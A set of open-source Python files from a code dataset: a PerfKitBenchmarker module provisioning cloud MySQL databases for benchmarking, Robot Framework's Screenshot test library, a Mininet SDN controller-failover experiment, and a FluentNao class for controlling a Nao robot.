# Now we can create a new DB subnet group that has two subnets in it.
db_subnet_group_name = 'pkb%s' % FLAGS.run_uri
create_db_subnet_group_cmd = util.AWS_PREFIX + [
'rds',
'create-db-subnet-group',
'--db-subnet-group-name', db_subnet_group_name,
'--db-subnet-group-description', 'pkb_subnet_group_for_db',
'--subnet-ids', vm.network.subnet.id, new_subnet.id]
stdout, stderr, _ = vm_util.IssueCommand(create_db_subnet_group_cmd)
logging.info('Created a DB subnet group, stdout is:\n%s\nstderr is:\n%s',
stdout, stderr)
vm.db_subnet_group_name = db_subnet_group_name
# open up tcp port 3306 in the VPC's security group, we need that to connect
# to the DB.
open_port_cmd = util.AWS_PREFIX + [
'ec2',
'authorize-security-group-ingress',
'--group-id', vm.group_id,
'--source-group', vm.group_id,
'--protocol', 'tcp',
'--port', MYSQL_PORT]
stdout, stderr, _ = vm_util.IssueCommand(open_port_cmd)
logging.info('Granted DB port ingress, stdout is:\n%s\nstderr is:\n%s',
stdout, stderr)
# Finally, it's time to create the DB instance!
vm.db_instance_id = 'pkb-DB-%s' % FLAGS.run_uri
db_class = \
RDS_CORE_TO_DB_CLASS_MAP['%s' % FLAGS.mysql_svc_db_instance_cores]
vm.db_instance_master_user = MYSQL_ROOT_USER
vm.db_instance_master_password = _GenerateRandomPassword()
create_db_cmd = util.AWS_PREFIX + [
'rds',
'create-db-instance',
'--db-instance-identifier', vm.db_instance_id,
'--db-instance-class', db_class,
'--engine', RDS_DB_ENGINE,
'--engine-version', RDS_DB_ENGINE_VERSION,
'--storage-type', RDS_DB_STORAGE_TYPE_GP2,
'--allocated-storage', RDS_DB_STORAGE_GP2_SIZE,
'--vpc-security-group-ids', vm.group_id,
'--master-username', vm.db_instance_master_user,
'--master-user-password', vm.db_instance_master_password,
'--availability-zone', vm.zone,
'--db-subnet-group-name', vm.db_subnet_group_name]
status_query_cmd = util.AWS_PREFIX + [
'rds',
'describe-db-instances',
'--db-instance-id', vm.db_instance_id]
stdout, stderr, _ = vm_util.IssueCommand(create_db_cmd)
logging.info('Request to create the DB has been issued, stdout:\n%s\n'
'stderr:%s\n', stdout, stderr)
response = json.loads(stdout)
db_creation_status = _RDSParseDBInstanceStatus(response)
for status_query_count in xrange(1, DB_STATUS_QUERY_LIMIT + 1):
if db_creation_status == 'available':
break
if db_creation_status not in RDS_DB_CREATION_PENDING_STATUS:
raise DBStatusQueryError('Invalid status in DB creation response. '
' stdout is\n%s, stderr is\n%s' % (
stdout, stderr))
logging.info('Querying db creation status, current state is %s, query '
'count is %d', db_creation_status, status_query_count)
time.sleep(DB_STATUS_QUERY_INTERVAL)
stdout, stderr, _ = vm_util.IssueCommand(status_query_cmd)
response = json.loads(stdout)
db_creation_status = _RDSParseDBInstanceStatus(response)
else:
raise DBStatusQueryError('DB creation timed-out, we have '
'waited at least %s * %s seconds.' % (
DB_STATUS_QUERY_INTERVAL,
DB_STATUS_QUERY_LIMIT))
# We are good now, db has been created. Now get the endpoint address.
# On RDS, you always connect with a DNS name, if you do that from a EC2 VM,
# that DNS name will be resolved to an internal IP address of the DB.
if 'DBInstance' in response:
vm.db_instance_address = response['DBInstance']['Endpoint']['Address']
else:
if 'DBInstances' in response:
vm.db_instance_address = \
response['DBInstances'][0]['Endpoint']['Address']
logging.info('Successfully created an RDS DB instance. Address is %s',
vm.db_instance_address)
logging.info('Complete output is:\n %s', response)
def Cleanup(self, vm):
"""Clean up RDS instances, cleanup the extra subnet created for the
creation of the RDS instance.
Args:
vm: The VM that was used as the test client, which also stores states
for clean-up.
"""
# Now, we can delete the DB instance. vm.db_instance_id is the id to call.
# We need to keep querying the status of the deletion here before we let
# this go. RDS DB deletion takes some time to finish. And we have to
# wait until this DB is deleted before we proceed because this DB holds
# references to various other resources: subnet groups, subnets, vpc, etc.
delete_db_cmd = util.AWS_PREFIX + [
'rds',
'delete-db-instance',
'--db-instance-identifier', vm.db_instance_id,
'--skip-final-snapshot']
logging.info('Deleting db instance %s...', vm.db_instance_id)
# Note below, the status of this deletion command is validated below in the
# loop. both stdout and stderr are checked.
stdout, stderr, _ = vm_util.IssueCommand(delete_db_cmd)
logging.info('Request to delete the DB has been issued, stdout:\n%s\n'
'stderr:%s\n', stdout, stderr)
status_query_cmd = util.AWS_PREFIX + [
'rds',
'describe-db-instances',
'--db-instance-id', vm.db_instance_id]
db_status = None
for status_query_count in xrange(1, DB_STATUS_QUERY_LIMIT + 1):
try:
response = json.loads(stdout)
db_status = _RDSParseDBInstanceStatus(response)
if db_status == 'deleting':
logging.info('DB is still in the deleting state, status_query_count '
'is %d', status_query_count)
# Wait for a few seconds and query status
time.sleep(DB_STATUS_QUERY_INTERVAL)
stdout, stderr, _ = vm_util.IssueCommand(status_query_cmd)
else:
logging.info('DB deletion status is no longer in deleting, it is %s',
db_status)
break
except:
# stdout cannot be parsed into json, it might simply be empty because
# deletion has been completed.
break
else:
logging.warn('DB is still in deleting state after long wait, bail.')
db_instance_deletion_failed = False
if db_status == 'deleted' or re.findall('DBInstanceNotFound', stderr):
# Sometimes we get a 'deleted' status from DB status query command,
# but even more times, the DB status query command would fail with
# an "not found" error, both are positive confirmation that the DB has
# been deleted.
logging.info('DB has been successfully deleted, got confirmation.')
else:
# We did not get a positive confirmation that the DB is deleted even after
# long wait, we have to bail. But we will log an error message, and
# then raise an exception at the end of this function so this particular
# run will show as a failed run to the user and allow them to examine
# the logs
db_instance_deletion_failed = True
logging.error(
'RDS DB instance %s failed to be deleted, we did not get '
'final confirmation from stderr, which is:\n %s', vm.db_instance_id,
stderr)
if hasattr(vm, 'db_subnet_group_name'):
delete_db_subnet_group_cmd = util.AWS_PREFIX + [
'rds',
'delete-db-subnet-group',
'--db-subnet-group-name', vm.db_subnet_group_name]
stdout, stderr, _ = vm_util.IssueCommand(delete_db_subnet_group_cmd)
logging.info('Deleted the db subnet group. stdout is:\n%s, stderr: \n%s',
stdout, stderr)
if hasattr(vm, 'extra_subnet_for_db'):
vm.extra_subnet_for_db.Delete()
if db_instance_deletion_failed:
raise DBStatusQueryError('Failed to get confirmation of DB instance '
'deletion! Check the log for details!')
class GoogleCloudSQLBenchmark(object):
"""MySQL benchmark based on the Google Cloud SQL service."""
def Prepare(self, vm):
"""Prepares the DB and everything for the provider GCP (Cloud SQL)
Args:
vm: The VM to be used as the test client
"""
# TODO: Refactor the GCP Cloud SQL instance creation and deletion logic out
# to a new class called GCPCloudSQLInstance that Inherits from
# perfkitbenchmarker.resource.BaseResource.
logging.info('Preparing MySQL Service benchmarks for Google Cloud SQL.')
vm.db_instance_name = 'pkb%s' % FLAGS.run_uri
db_tier = 'db-n1-standard-%s' % FLAGS.mysql_svc_db_instance_cores
# Currently, we create DB instance in the same zone as the test VM.
db_instance_zone = vm.zone
# Currently GCP REQUIRES you to connect to the DB instance via external IP
# (i.e., using external IPs of the DB instance AND the VM instance).
authorized_network = '%s/32' % vm.ip_address
create_db_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'create', vm.db_instance_name,
'--quiet',
'--format=json',
'--async',
'--activation-policy=ALWAYS',
'--assign-ip',
'--authorized-networks=%s' % authorized_network,
'--backup-start-time=%s' % DEFAULT_BACKUP_START_TIME,
'--enable-bin-log',
'--tier=%s' % db_tier,
'--gce-zone=%s' % db_instance_zone,
'--database-version=%s' % GCP_MY_SQL_VERSION,
'--pricing-plan=%s' % GCP_PRICING_PLAN]
stdout, _, _ = vm_util.IssueCommand(create_db_cmd)
response = json.loads(stdout)
if response['operation'] is None or response['operationType'] != 'CREATE':
raise DBStatusQueryError('Invalid operation or unrecognized '
'operationType in DB creation response. '
' stdout is %s' % stdout)
status_query_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'describe', vm.db_instance_name,
'--format', 'json']
stdout, _, _ = vm_util.IssueCommand(status_query_cmd)
response = json.loads(stdout)
query_count = 1
while True:
state = response['state']
if state is None:
raise ValueError('Cannot parse response from status query command. '
'The state is missing. stdout is %s' % stdout)
if state == 'RUNNABLE':
break
else:
if query_count > DB_STATUS_QUERY_LIMIT:
raise DBStatusQueryError('DB creation timed-out, we have '
'waited at least %s * %s seconds.' % (
DB_STATUS_QUERY_INTERVAL,
DB_STATUS_QUERY_LIMIT))
logging.info('Querying db creation status, current state is %s, query '
'count is %d', state, query_count)
time.sleep(DB_STATUS_QUERY_INTERVAL)
stdout, _, _ = vm_util.IssueCommand(status_query_cmd)
response = json.loads(stdout)
query_count += 1
logging.info('Successfully created the DB instance. Complete response is '
'%s', response)
vm.db_instance_address = response['ipAddresses'][0]['ipAddress']
logging.info('DB IP address is: %s', vm.db_instance_address)
# Set the root password to a common one that can be referred to in common
# code across providers.
vm.db_instance_master_user = MYSQL_ROOT_USER
vm.db_instance_master_password = _GenerateRandomPassword()
set_password_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'set-root-password',
vm.db_instance_name,
'--password', vm.db_instance_master_password]
stdout, stderr, _ = vm_util.IssueCommand(set_password_cmd)
logging.info('Set root password completed. Stdout:\n%s\nStderr:\n%s',
stdout, stderr)
def Cleanup(self, vm):
if hasattr(vm, 'db_instance_name'):
delete_db_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'delete', vm.db_instance_name,
'--quiet']
stdout, stderr, status = vm_util.IssueCommand(delete_db_cmd)
logging.info('DB cleanup command issued, stdout is %s, stderr is %s '
'status is %s', stdout, stderr, status)
else:
logging.info('db_instance_name does not exist, no need to cleanup.')
MYSQL_SERVICE_BENCHMARK_DICTIONARY = {
benchmark_spec_class.GCP: GoogleCloudSQLBenchmark(),
benchmark_spec_class.AWS: RDSMySQLBenchmark()}
def Prepare(benchmark_spec):
"""Prepare the MySQL DB Instances, configures it.
Prepare the client test VM, installs SysBench, configures it.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
# We would like to always cleanup server side states.
# If we don't set this, our cleanup function will only be called when the VM
# is static VM, but we have server side states to cleanup regardless of the
# VM type.
benchmark_spec.always_call_cleanup = True
vms = benchmark_spec.vms
# Setup common test tools required on the client VM
vms[0].Install('sysbench05plus')
# Prepare service specific states (create DB instance, configure it, etc)
MYSQL_SERVICE_BENCHMARK_DICTIONARY[FLAGS.cloud].Prepare(vms[0])
def Run(benchmark_spec):
"""Run the MySQL Service benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Results.
"""
logging.info('Start benchmarking MySQL Service, '
'Cloud Provider is %s.', FLAGS.cloud)
vms = benchmark_spec.vms
metadata = {
'mysql_svc_oltp_tables_count': FLAGS.mysql_svc_oltp_tables_count,
'mysql_svc_oltp_table_size': FLAGS.mysql_svc_oltp_table_size,
'mysql_svc_db_instance_cores': FLAGS.mysql_svc_db_instance_cores,
'sysbench_warm_up_seconds': FLAGS.sysbench_warmup_seconds,
'sysbench_run_seconds': FLAGS.sysbench_run_seconds,
'sysbench_thread_count': FLAGS.sysbench_thread_count,
'sysbench_latency_percentile': FLAGS.sysbench_latency_percentile,
'sysbench_report_interval': FLAGS.sysbench_report_interval
}
# The run phase is common across providers. The VMs[0] object contains all
# information and states necessary to carry out the run.
results = _RunSysbench(vms[0], metadata)
print results
return results
def Cleanup(benchmark_spec):
"""Clean up MySQL Service benchmark related states on server and client.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
vms = benchmark_spec.vms
MYSQL_SERVICE_BENCHMARK_DICTIONARY[FLAGS.cloud].Cleanup(vms[0])
|
mateusz-blaszkowski/PerfKitBenchmarker
|
perfkitbenchmarker/linux_benchmarks/mysql_service_benchmark.py
|
Python
|
apache-2.0
| 33,031
| 0.004874
|
# Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
if sys.platform.startswith('java'):
from java.awt import Toolkit, Robot, Rectangle
from javax.imageio import ImageIO
from java.io import File
elif sys.platform == 'cli':
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Drawing import Bitmap, Graphics, Imaging
from System.Windows.Forms import Screen
else:
try:
import wx
except ImportError:
wx = None
try:
from gtk import gdk
except ImportError:
gdk = None
try:
from PIL import ImageGrab # apparently available only on Windows
except ImportError:
ImageGrab = None
from robot import utils
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.version import get_version
class Screenshot(object):
"""Test library for taking screenshots on the machine where tests are run.
Notice that successfully taking screenshots requires tests to be run with
a physical or virtual display.
This library was heavily enhanced in Robot Framework 2.5.5 release. Old
keywords for taking screenshots were deprecated and they have since been
removed.
= Using with Python =
With Python you need to have one of the following modules installed to be
able to use this library. The first module that is found will be used.
- wxPython :: http://wxpython.org :: Required also by RIDE so many Robot
Framework users already have this module installed.
- PyGTK :: http://pygtk.org :: This module is available by default on most
Linux distributions.
- Python Imaging Library (PIL) :: http://www.pythonware.com/products/pil ::
This module can take screenshots only on Windows.
= Using with Jython and IronPython =
With Jython and IronPython this library uses APIs provided by JVM and .NET
platforms, respectively. These APIs are always available and thus no
external modules are needed.
IronPython support was added in Robot Framework 2.7.5.
= Where screenshots are saved =
By default screenshots are saved into the same directory where the Robot
Framework log file is written. If no log is created, screenshots are saved
into the directory where the XML output file is written.
It is possible to specify a custom location for screenshots using
`screenshot_directory` argument in `importing` and `Set Screenshot Directory`
keyword during execution. It is also possible to save screenshots using
an absolute path.
"""
ROBOT_LIBRARY_SCOPE = 'TEST SUITE'
ROBOT_LIBRARY_VERSION = get_version()
def __init__(self, screenshot_directory=None):
"""Configure where screenshots are saved.
If `screenshot_directory` is not given, screenshots are saved into
same directory as the log file. The directory can also be set using
`Set Screenshot Directory` keyword.
Examples (use only one of these):
| =Setting= | =Value= | =Value= | =Value= |
| Library | Screenshot | | # Default location |
| Library | Screenshot | ${TEMPDIR} | # System temp |
"""
self._given_screenshot_dir = self._norm_path(screenshot_directory)
self._screenshot_taker = ScreenshotTaker()
def _norm_path(self, path):
if not path:
return path
return os.path.normpath(path.replace('/', os.sep))
@property
def _screenshot_dir(self):
return self._given_screenshot_dir or self._log_dir
@property
def _log_dir(self):
variables = BuiltIn().get_variables()
outdir = variables['${OUTPUTDIR}']
log = variables['${LOGFILE}']
log = os.path.dirname(log) if log != 'NONE' else '.'
return self._norm_path(os.path.join(outdir, log))
def set_screenshot_directory(self, path):
"""Sets the directory where screenshots are saved.
It is possible to use `/` as a path separator in all operating systems.
Path to the old directory is returned.
The directory can also be set in `importing`.
"""
path = self._norm_path(path)
if not os.path.isdir(path):
raise RuntimeError("Directory '%s' does not exist." % path)
old = self._screenshot_dir
self._given_screenshot_dir = path
return old
def take_screenshot(self, name="screenshot", width="800px"):
"""Takes a screenshot in JPEG format and embeds it into the log file.
Name of the file where the screenshot is stored is derived from the
given `name`. If the `name` ends with extension `.jpg` or `.jpeg`,
the screenshot will be stored with that exact name. Otherwise a unique
name is created by adding an underscore, a running index and
an extension to the `name`.
The name will be interpreted to be relative to the directory where
the log file is written. It is also possible to use absolute paths.
Using `/` as a path separator works in all operating systems.
`width` specifies the size of the screenshot in the log file.
Examples: (LOGDIR is determined automatically by the library)
| Take Screenshot | | | # LOGDIR/screenshot_1.jpg (index automatically incremented) |
| Take Screenshot | mypic | | # LOGDIR/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | ${TEMPDIR}/mypic | | # /tmp/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | pic.jpg | | # LOGDIR/pic.jpg (always uses this file) |
| Take Screenshot | images/login.jpg | 80% | # Specify both name and width. |
| Take Screenshot | width=550px | | # Specify only width. |
The path where the screenshot is saved is returned.
"""
path = self._save_screenshot(name)
self._embed_screenshot(path, width)
return path
def take_screenshot_without_embedding(self, name="screenshot"):
"""Takes a screenshot and links it from the log file.
This keyword is otherwise identical to `Take Screenshot` but the saved
screenshot is not embedded into the log file. The screenshot is linked
so it is nevertheless easily available.
"""
path = self._save_screenshot(name)
self._link_screenshot(path)
return path
def _save_screenshot(self, basename, directory=None):
path = self._get_screenshot_path(basename, directory)
return self._screenshot_to_file(path)
def _screenshot_to_file(self, path):
path = self._validate_screenshot_path(path)
logger.debug('Using %s modules for taking screenshot.'
% self._screenshot_taker.module)
try:
self._screenshot_taker(path)
except:
logger.warn('Taking screenshot failed: %s\n'
'Make sure tests are run with a physical or virtual display.'
% utils.get_error_message())
return path
def _validate_screenshot_path(self, path):
path = utils.abspath(self._norm_path(path))
if not os.path.exists(os.path.dirname(path)):
raise RuntimeError("Directory '%s' where to save the screenshot "
"does not exist" % os.path.dirname(path))
return path
def _get_screenshot_path(self, basename, directory):
directory = self._norm_path(directory) if directory else self._screenshot_dir
if basename.lower().endswith(('.jpg', '.jpeg')):
return os.path.join(directory, basename)
index = 0
while True:
index += 1
path = os.path.join(directory, "%s_%d.jpg" % (basename, index))
if not os.path.exists(path):
return path
def _embed_screenshot(self, path, width):
link = utils.get_link_path(path, self._log_dir)
logger.info('<a href="%s"><img src="%s" width="%s"></a>'
% (link, link, width), html=True)
def _link_screenshot(self, path):
link = utils.get_link_path(path, self._log_dir)
logger.info("Screenshot saved to '<a href=\"%s\">%s</a>'."
% (link, path), html=True)
class ScreenshotTaker(object):
def __init__(self, module_name=None):
self._screenshot = self._get_screenshot_taker(module_name)
self.module = self._screenshot.__name__.split('_')[1]
self._wx_app_reference = None
def __call__(self, path):
self._screenshot(path)
def __nonzero__(self):
return self.module != 'no'
def test(self, path=None):
print "Using '%s' module." % self.module
if not self:
return False
if not path:
print "Not taking test screenshot."
return True
print "Taking test screenshot to '%s'." % path
try:
self(path)
except:
print "Failed: %s" % utils.get_error_message()
return False
else:
print "Success!"
return True
def _get_screenshot_taker(self, module_name):
if sys.platform.startswith('java'):
return self._java_screenshot
if sys.platform == 'cli':
return self._cli_screenshot
if module_name:
method_name = '_%s_screenshot' % module_name.lower()
if hasattr(self, method_name):
return getattr(self, method_name)
return self._get_default_screenshot_taker()
def _get_default_screenshot_taker(self):
for module, screenshot_taker in [(wx, self._wx_screenshot),
(gdk, self._gtk_screenshot),
(ImageGrab, self._pil_screenshot),
(True, self._no_screenshot)]:
if module:
return screenshot_taker
def _java_screenshot(self, path):
size = Toolkit.getDefaultToolkit().getScreenSize()
rectangle = Rectangle(0, 0, size.width, size.height)
image = Robot().createScreenCapture(rectangle)
ImageIO.write(image, 'jpg', File(path))
def _cli_screenshot(self, path):
bmp = Bitmap(Screen.PrimaryScreen.Bounds.Width,
Screen.PrimaryScreen.Bounds.Height)
graphics = Graphics.FromImage(bmp)
try:
graphics.CopyFromScreen(0, 0, 0, 0, bmp.Size)
finally:
graphics.Dispose()
bmp.Save(path, Imaging.ImageFormat.Jpeg)
def _wx_screenshot(self, path):
if not self._wx_app_reference:
self._wx_app_reference = wx.PySimpleApp()
context = wx.ScreenDC()
width, height = context.GetSize()
bitmap = wx.EmptyBitmap(width, height, -1)
memory = wx.MemoryDC()
memory.SelectObject(bitmap)
memory.Blit(0, 0, width, height, context, -1, -1)
memory.SelectObject(wx.NullBitmap)
bitmap.SaveFile(path, wx.BITMAP_TYPE_JPEG)
def _gtk_screenshot(self, path):
window = gdk.get_default_root_window()
if not window:
raise RuntimeError('Taking screenshot failed')
width, height = window.get_size()
pb = gdk.Pixbuf(gdk.COLORSPACE_RGB, False, 8, width, height)
pb = pb.get_from_drawable(window, window.get_colormap(),
0, 0, 0, 0, width, height)
if not pb:
raise RuntimeError('Taking screenshot failed')
pb.save(path, 'jpeg')
def _pil_screenshot(self, path):
ImageGrab.grab().save(path, 'JPEG')
def _no_screenshot(self, path):
raise RuntimeError('Taking screenshots is not supported on this platform '
'by default. See library documentation for details.')
if __name__ == "__main__":
if len(sys.argv) not in [2, 3]:
sys.exit("Usage: %s <path> [wx|gtk|pil] OR test [<path>]" % os.path.basename(sys.argv[0]))
if sys.argv[1] == 'test':
sys.exit(0 if ScreenshotTaker().test(*sys.argv[2:]) else 1)
path = utils.abspath(sys.argv[1])
module = sys.argv[2] if len(sys.argv) == 3 else None
shooter = ScreenshotTaker(module)
print 'Using %s modules' % shooter.module
shooter(path)
print path
|
eric-stanley/robotframework
|
src/robot/libraries/Screenshot.py
|
Python
|
apache-2.0
| 13,020
| 0.000998
|
#!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import time
import os
import subprocess
import csv
import StringIO
import iptc
HOSTS = 3
p1_log = open('logs-example/log.p1.txt', 'w')
p2_log = open('logs-example/log.p2.txt', 'w')
def closePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.insert_rule(rule)
def unClosePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.delete_rule(rule)
def myNet():
global p1
global p2
global p3
global p4
cPort1=6666
cPort2=6667
hosts=[]
kill = 0
net = Mininet( topo=None, build=False, autoSetMacs=True)
con1 = net.addController( 'c0', controller=RemoteController, ip='127.0.0.1', port=cPort1)
con2 = net.addController( 'c1', controller=RemoteController, ip='127.0.0.1', port=cPort2)
for x in range(0, HOSTS):
hostname = "h%d" %(x)
switchname = "s%d" %(x)
host = net.addHost(hostname)
switch = net.addSwitch(switchname)
if (x!=0):
net.addLink(switch, lastswitch)
lastswitch = switch
net.addLink(host,switch)
net.build()
switch.start([con1,con2])
hosts.append(host)
net.start()
tping = time.time()
print 'h0 ping : %.10f' % tping
hosts[0].cmdPrint('hping3 -c 200 -i u20000 ',hosts[1].IP(),' > logs-example/log.ping12.txt 2>&1 &')
#20ms every ping * 200 -> 4s
while True:
tcur = time.time()
if tcur - tping > 2: # after 2s running
# print 'SET ROLE C1 SLAVE '
# p1.stdin.write("import pox.openflow.nicira as nx\n")
# p1.stdin.write("for connection in core.openflow.connections:\n")
# p1.stdin.write("\tconnection.send(nx.nx_role_request(slave='true'))\n")
# p1.stdin.write('\n')
print 'close port %i in %.10f' %(cPort1,tcur)
closePort(cPort1)
break
print 'START C2 AS MASTER at %.10f' %time.time()
p2 = subprocess.Popen(['pox/pox.py',"master67"],stdin=subprocess.PIPE, stdout=p2_log,stderr=p2_log,preexec_fn=os.setpgrp)
while True:
p = subprocess.Popen(["ovs-vsctl", "-f", "csv", "list", "controller"], stdout=subprocess.PIPE)
output, err = p.communicate()
f = StringIO.StringIO(output)
reader = csv.reader(f, delimiter=',')
rownum = 0
con66 = [] # not using this for now
con67 = []
for row in reader:
uuid = row[0]
target = row[15]
role = row[13]
i = target.find(str(cPort2))
if i != -1:
if (role == 'master'):
con67.append(uuid)
f.close()
if len(con67) == HOSTS:
uptime = time.time()
print 'new master ready at %.10f' %uptime
break
print 'now wait for hping3 to finish..'
hosts[0].cmdPrint('wait %hping3')
print 'hping3 finished at %.10f' %time.time()
print 'open the port..'
unClosePort(cPort1)
print 'stopping mininet'
net.stop()
print 'stopping pox(s)..'
p1.terminate()
p2.terminate()
print 'timestamp difference %.10f' %(uptime-tcur)
if __name__ == '__main__':
setLogLevel( 'info' )
p1 = subprocess.Popen(['pox/pox.py', "master66"],stdin=subprocess.PIPE, stdout=p1_log,stderr=p1_log,preexec_fn=os.setpgrp)
print 'c1 runs, master'
print 'wait for 3 seconds...'
time.sleep(3)
myNet()
print 'close pox logs..'
p1_log.close()
p2_log.close()
print 'bye'
# t.process.terminate()
|
ardhipoetra/SDN-workbench
|
sch3.py
|
Python
|
gpl-2.0
| 3,578
| 0.044159
|
'''
Created on 31st October , 2012
@author: Don Najd
'''
import logging
from naoutil.naoenv import NaoEnvironment, make_environment
from fluentnao.core.arms import Arms
from fluentnao.core.elbows import Elbows
from fluentnao.core.feet import Feet
from fluentnao.core.hands import Hands
from fluentnao.core.head import Head
from fluentnao.core.joints import Joints
from fluentnao.core.legs import Legs
from fluentnao.core.wrists import Wrists
from fluentnao.core.leds import Leds
from fluentnao.core.audio import Audio
from fluentnao.core.naoscript import NaoScript
import almath
import math
import time
from datetime import datetime, timedelta
class Nao(object):
# init method
def __init__(self, env, log_function=None):
super(Nao, self).__init__()
# jobs for threading
self.jobs = []
# set motion proxy & log
self.env = env
self.log_function = log_function
if not log_function:
self.logger = logging.getLogger("fluentnao.nao.Nao")
# joints
self.joints = Joints()
self.chains = self.joints.Chains
# other
self.naoscript = NaoScript(self)
self.leds = Leds(self)
self.audio = Audio(self)
# head
self.head = Head(self)
# arms
self.hands = Hands(self)
self.wrists = Wrists(self, self.hands)
self.elbows = Elbows(self, self.wrists, self.hands)
self.arms = Arms(self, self.elbows, self.wrists, self.hands)
# legs
self.feet = Feet(self)
self.legs = Legs(self, self.feet)
# global duration
self.set_duration(1.5)
def log(self, msg):
if (self.log_function):
self.log_function(str(datetime.now()) + "|" + msg)
else:
self.logger.debug(str(datetime.now()) + "|" + msg)
###################################
# text to speech
###################################
def say(self, text):
self.env.tts.post.say(text)
return self;
def say_and_block(self, text):
self.env.tts.say(text)
return self;
def wait(self, seconds):
time.sleep(seconds)
return self;
###################################
# Postures
###################################
def stand_init(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandInit", speed))
taskId = self.env.robotPosture.post.goToPosture("StandInit", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit_relax(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("SitRelax", speed))
taskId = self.env.robotPosture.post.goToPosture("SitRelax", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand_zero(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandZero", speed))
taskId = self.env.robotPosture.post.goToPosture("StandZero", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_belly(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBelly", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBelly", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_back(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBack", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBack", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Stand", speed))
self.env.robotPosture.goToPosture("Stand", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
def crouch(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Crouch", speed))
taskId = self.env.robotPosture.post.goToPosture("Crouch", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Sit", speed))
self.env.robotPosture.post.goToPosture("Sit", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
###################################
# stiffness
###################################
def stiff(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 1.0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
def rest(self):
self.env.motion.rest()
return self;
def relax(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
###################################
# Whole Body Motion & Balance
###################################
def whole_body_disable(self):
self.log("wbDisable")
isEnabled = False
self.env.motion.wbEnable(isEnabled)
def whole_body_enable(self):
self.log("wbEnable")
isEnabled = True
self.env.motion.wbEnable(isEnabled)
def foot_state(self, supportLeg="Legs", stateName="Fixed"):
# Legs are constrained fixed
# supportLeg: Legs, LLeg or RLeg
# stateName: Fixed, Plane or Free
self.log("supportLeg=%s|stateName=%s" % (supportLeg, stateName))
self.env.motion.wbFootState(stateName, supportLeg)
def constrain_motion(self, supportLeg="Legs"):
# Constraint Balance Motion / Support Polygon
# supportLeg: Legs, LLeg or RLeg
isEnable = True
self.env.motion.wbEnableBalanceConstraint(isEnable, supportLeg)
def balance(self, leg, duration):
duration = self.determine_duration(duration)
# stiffen body
self.stiff()
self.whole_body_endable()
self.foot_state()
self.constrain_motion()
# Com go to LLeg
supportLeg = leg
self.env.motion.wbGoToBalance(supportLeg, duration)
self.whole_body_disable()
###################################
# Duration
###################################
def set_duration(self, durationInSeconds):
self.globalDuration = durationInSeconds
return self;
def determine_duration(self, durationInSeconds):
if durationInSeconds > 0:
return durationInSeconds
return self.globalDuration
###################################
# blocking
###################################
def go(self):
for taskId in self.jobs:
self.log("taskId=%s|action=wait" % (taskId))
d1 = datetime.now()
self.env.motion.wait(taskId, 8000)
d2 = datetime.now()
r = d2 - d1
self.log("taskId=%s|action=done|seconds=%s" % (taskId, r.total_seconds()))
self.jobs[:] = []
self.log("done")
return self
###################################
# movement
###################################
def move(self, chain, angleListInRadians, timeListInSeconds):
# motion w/ blocking call
taskId = self.env.motion.post.angleInterpolation(chain, angleListInRadians, timeListInSeconds, True)
# log
self.log("|taskId=%s|chain=%s|angleList=%s" % (taskId, chain, angleListInRadians))
self.jobs.append(taskId)
def move_with_degrees_and_duration(self, jointName, angleInDegrees, durationInSeconds):
# convert to radians
angleInRadians = angleInDegrees * almath.TO_RAD
# move
self.move(jointName, [angleInRadians], durationInSeconds)
###################################
# helpers
###################################
def get_target_angles_for_chain(self, chain, angle):
# Get the Number of Joints
numBodies = len(self.env.motion.getJointNames(chain))
# We prepare a collection of floats
return [angle] * numBodies
